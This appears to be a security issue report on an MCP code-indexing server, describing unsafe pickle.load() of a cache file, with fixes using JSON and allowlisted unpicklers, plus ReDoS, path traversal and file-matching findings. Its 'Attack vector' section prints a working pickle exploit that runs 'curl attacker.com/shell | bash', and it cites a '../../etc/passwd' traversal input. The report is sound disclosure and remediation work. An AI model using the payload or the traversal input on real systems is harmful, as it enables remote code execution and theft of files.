Security: pickle.load() without integrity check enables arbitrary code execution

## Summary

The cache loader in `server.py` calls `pickle.load()` on `.codebase-index-cache.pkl` before any validation. Because unpickling can invoke arbitrary callables while the stream is still being read, the `isinstance()` checks that follow run too late to offer any protection.

## Vulnerable code

```python
# server.py lines ~183-201
def _load_cache(project_root: str) -> "ProjectIndex | None":
    path = _cache_path(project_root)
    if not os.path.exists(path):
        return None
    try:
        with open(path, "rb") as f:
            payload = pickle.load(f)   # <-- code executes HERE
        if not isinstance(payload, dict) or payload.get("version") != _CACHE_VERSION:
            return None
        index = payload["index"]
        if not isinstance(index, PI):
            return None
        return index
    # (except clause not shown in this excerpt)
```

## Attack vector

Any process with write access to the project directory can plant a malicious `.codebase-index-cache.pkl`:

```python
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl attacker.com/shell | bash",))

with open(".codebase-index-cache.pkl", "wb") as f:
    pickle.dump({"version": 1, "index": Exploit()}, f)
```

On the next MCP server start (or first tool call), `_ensure_index() -> _load_cache()` runs the payload with the privileges of the MCP server process.

A malicious actor could also commit the file to a public repo: any developer who clones it and starts the MCP server against that checkout would run the payload with no prompt or warning.
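The ordering problem can be confirmed without running anything dangerous. The sketch below swaps the shell command for a harmless `os.mkdir` call; the `SideEffect` class and the marker path are illustrative names, not part of the project. It shows that the side effect has already happened by the time the type check rejects the payload.

```python
import os
import pickle
import tempfile


class SideEffect:
    """Benign stand-in for the exploit: creates a directory when unpickled."""

    def __init__(self, marker: str) -> None:
        self.marker = marker

    def __reduce__(self):
        # pickle records "call os.mkdir(marker)" instead of the object's state.
        return (os.mkdir, (self.marker,))


marker = os.path.join(tempfile.mkdtemp(), "ran-during-load")
blob = pickle.dumps(SideEffect(marker))

payload = pickle.loads(blob)                  # os.mkdir runs here, inside loads()
rejected = not isinstance(payload, dict)      # the later type check does reject it...
side_effect_happened = os.path.isdir(marker)  # ...but the directory already exists
```

Both `rejected` and `side_effect_happened` end up true, which is the situation `_load_cache()` is in when it reaches its `isinstance()` checks.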

## Suggested fix

**Option A: Replace pickle with JSON** (recommended): Serialize only the structural metadata (dicts, lists, strings, ints). A JSON parser produces plain data and never invokes callables, so this removes the code-execution path rather than filtering it.
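As a rough illustration of Option A, here is a minimal JSON round trip with explicit validation on load. The `FileEntry` dataclass, the `files` key, and the function names are hypothetical stand-ins, since the real `ProjectIndex` layout is not shown in this issue; only the version check mirrors the existing loader.

```python
import json
import os
import tempfile
from dataclasses import asdict, dataclass, field
from typing import List, Optional

CACHE_VERSION = 1  # hypothetical; stands in for _CACHE_VERSION


@dataclass
class FileEntry:  # hypothetical stand-in for one indexed file
    path: str
    functions: List[str] = field(default_factory=list)


def save_cache(path: str, entries: List[FileEntry]) -> None:
    payload = {"version": CACHE_VERSION, "files": [asdict(e) for e in entries]}
    with open(path, "w", encoding="utf-8") as f:
        json.dump(payload, f)


def load_cache(path: str) -> Optional[List[FileEntry]]:
    """Return the cached entries, or None if the file is missing or malformed."""
    try:
        with open(path, encoding="utf-8") as f:
            payload = json.load(f)  # parses data only; no callables are invoked
    except (OSError, ValueError):   # ValueError covers JSON and decoding errors
        return None
    if not isinstance(payload, dict) or payload.get("version") != CACHE_VERSION:
        return None
    try:
        # Rebuild typed objects field by field instead of trusting the file.
        return [
            FileEntry(path=str(item["path"]),
                      functions=[str(name) for name in item["functions"]])
            for item in payload["files"]
        ]
    except (KeyError, TypeError):
        return None


cache_file = os.path.join(tempfile.mkdtemp(), "index-cache.json")
save_cache(cache_file, [FileEntry("server.py", ["_load_cache"])])
loaded = load_cache(cache_file)

with open(cache_file, "w", encoding="utf-8") as f:
    f.write('{"version": 1, "files": "not a list"}')
tampered = load_cache(cache_file)
```

A tampered or truncated file can at worst make `load_cache` return `None`, which the caller can treat as a cache miss and rebuild the index.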

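**Option B: SafeUnpickler with allowlist**:

```python
import pickle

# Modules whose globals may be referenced by the cache file.
_SAFE_MODULES = {"mcp_codebase_index.models", "mcp_codebase_index.project_indexer"}

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the stream references, before it is used.
        if module not in _SAFE_MODULES:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)

# In _load_cache(), in place of pickle.load(f):
with open(path, "rb") as f:
    payload = SafeUnpickler(f).load()
```

A module-level allowlist is weaker than it looks: `find_class` resolves `name` as an attribute of the module, and with pickle protocol 4 and later the name may be dotted. If an allowlisted module imports `os` or `subprocess` at top level, a crafted stream may be able to reach those through it. Allowlisting exact `(module, name)` pairs closes that gap.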
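A stricter form of the allowlist pins exact `(module, name)` pairs instead of whole modules. The sketch below is self-contained and uses a placeholder allowlist entry (`collections.OrderedDict`), since the real class names in the cache are not listed here; `AllowlistUnpickler`, `safe_loads`, and `CallsGetcwd` are illustrative names. The blocked payload calls `os.getcwd` as a harmless stand-in for `os.system`.

```python
import io
import os
import pickle

# Hypothetical allowlist of exact (module, name) pairs. The real entries would be
# the classes the cache file actually contains.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Reject any global that is not an exact allowlisted pair.
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


class CallsGetcwd:
    def __reduce__(self):
        return (os.getcwd, ())  # benign stand-in for os.system(...)


try:
    safe_loads(pickle.dumps(CallsGetcwd()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True

# Plain containers and scalars never go through find_class, so they still load.
plain = safe_loads(pickle.dumps({"version": 1, "index": [1, 2, 3]}))
```

The unpickler raises before the referenced callable is ever looked up, so the payload is rejected without being executed, while ordinary data still loads.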

## Additional findings from the same audit

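- **ReDoS** in `search_codebase` (query_api.py): user-supplied regex applied to every line with no timeout. Mitigation: the third-party `regex` library, whose matching functions accept a `timeout` argument (e.g. `timeout=2.0`), or `signal.alarm` (Unix only, main thread only).
- **Path traversal in `reindex_file`** (project_indexer.py ~L186): `../../etc/passwd` not validated against root. Fix: resolve the joined path and reject it unless it lies inside the project root. A plain `rel_path.startswith("..")` check is not enough, because it misses absolute paths and inputs such as `src/../../etc/passwd`.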
- **Ambiguous endswith matching** in `_resolve_file` (query_api.py ~L233): can return unintended files.
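For the path traversal and suffix-matching findings, a minimal sketch of the checks I have in mind follows. The function names and sample paths are hypothetical, and the actual logic in `reindex_file` and `_resolve_file` may need different handling; this only illustrates containment checking after resolution and matching on whole path components.

```python
import tempfile
from pathlib import Path, PurePosixPath


def resolve_inside_root(project_root: str, rel_path: str) -> Path:
    """Resolve rel_path under project_root, rejecting anything that escapes it."""
    root = Path(project_root).resolve()
    candidate = (root / rel_path).resolve()
    candidate.relative_to(root)  # raises ValueError if candidate is outside root
    return candidate


def match_by_suffix(known_files, query: str) -> str:
    """Match query against whole trailing path components, refusing ambiguity."""
    parts = PurePosixPath(query).parts
    hits = [f for f in known_files
            if parts and PurePosixPath(f).parts[-len(parts):] == parts]
    if len(hits) != 1:
        raise LookupError(f"{query!r} matched {len(hits)} files")
    return hits[0]


def escapes(root: str, rel_path: str) -> bool:
    try:
        resolve_inside_root(root, rel_path)
        return False
    except ValueError:
        return True


root = tempfile.mkdtemp()
results = {p: escapes(root, p)
           for p in ("src/a.py", "../../etc/passwd", "src/../../x")}
# str.endswith("utils.py") would match both files; component matching picks one.
picked = match_by_suffix(["src/utils.py", "src/my_utils.py"], "utils.py")
```

Resolving before comparing also covers symlinks that point outside the root, which a string prefix check cannot see.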

## Environment

Discovered during a local security audit before production deployment. Cache files added to `.gitignore` as interim mitigation. Happy to submit a PR.
